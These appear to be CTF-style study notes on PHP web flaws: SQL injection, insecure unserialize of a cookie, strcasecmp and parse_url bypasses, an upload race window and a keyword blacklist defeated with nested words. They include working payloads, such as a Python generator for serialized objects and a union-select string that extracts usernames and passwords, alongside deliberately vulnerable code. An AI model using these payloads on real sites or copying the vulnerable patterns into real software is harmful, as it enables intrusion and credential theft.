PHP

SQL Injection

Uses string concatenations

 $query = 'SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1';

Should use prepared statements

$sql = "INSERT INTO MyGuests (firstname, lastname, email) VALUES (?, ?, ?)";

// Prepare the SQL query template
if($stmt = $conn->prepare($sql)) {
  // Bind parameters
  $stmt->bind_param("sss", $firstname, $lastname, $email);

  // Set parameters and execute
  $firstname = "John";
  $lastname = "Doe";
  $email = "john@example.com";
  $stmt->execute();

Serialization

Able to bypass by using by passing it as an object as they only check if it is an array

$sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
 try {
        if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
            die('CANT HACK US!!!');
        }
    } catch(Exception $e) {
        echo $e;
    }

def generate_payload(query):
    # Craft the PHP serialized object manually
    # O:3:"SQL":1:{s:5:"query";s:<query_len>:"<query>";}
    
    query_len = len(query)
    serialized = f'O:3:"SQL":1:{{s:5:"query";s:{query_len}:"{query}";}}'
    
    # Base64 encode it
    payload = base64.b64encode(serialized.encode()).decode()
    return serialized, payload

Strcmp and Strcasecmp

Able to be bypass by sending it as an array

if (! strcasecmp ($_POST['flag'], $flag))

flag[]=test

parse_url

parse_url will return as null if we use a URL like this: https://test.com///level1/index.php?page=flag

parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);

It will interprets as ///level25/index.php?page=flag

TOUTOC

There is a brief window where the attacker is able to access the php file after uploading, mainly is at file_put_contents($filename, $flagfilecontent) and unlink($filename)

...
  $filename = './tmp/' . md5($_SERVER['REMOTE_ADDR']) . '.php';
  ...
  $fp = fopen($_FILES['flag_file']['tmp_name'], 'r');
  $flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name']));
  @fclose($fp);

    file_put_contents($filename, $flagfilecontent);
  ...
  unlink($filename);
...

preg_match

In this code, they only check for the blacklisted words once and process the query

class LevelTwo {
    public function doQuery($injection) {
        $pdo = new SQLite3('leveltwo.db', SQLITE3_OPEN_READONLY);

        $searchWords = implode (['union', 'order', 'select', 'from', 'group', 'by'], '|');
        $injection = preg_replace ('/' . $searchWords . '/i', '', $injection);

        $query = 'SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1';
        $getUsers = $pdo->query ($query);
        $users = $getUsers->fetchArray (SQLITE3_ASSOC);

        if ($users) {
            return $users;
        }

        return false;
    }
}

So, I can do something like this

5 ununionion seselectlect username,password frfromom users

and it will filter and become this when being parsed into the query

5 union select username,password from users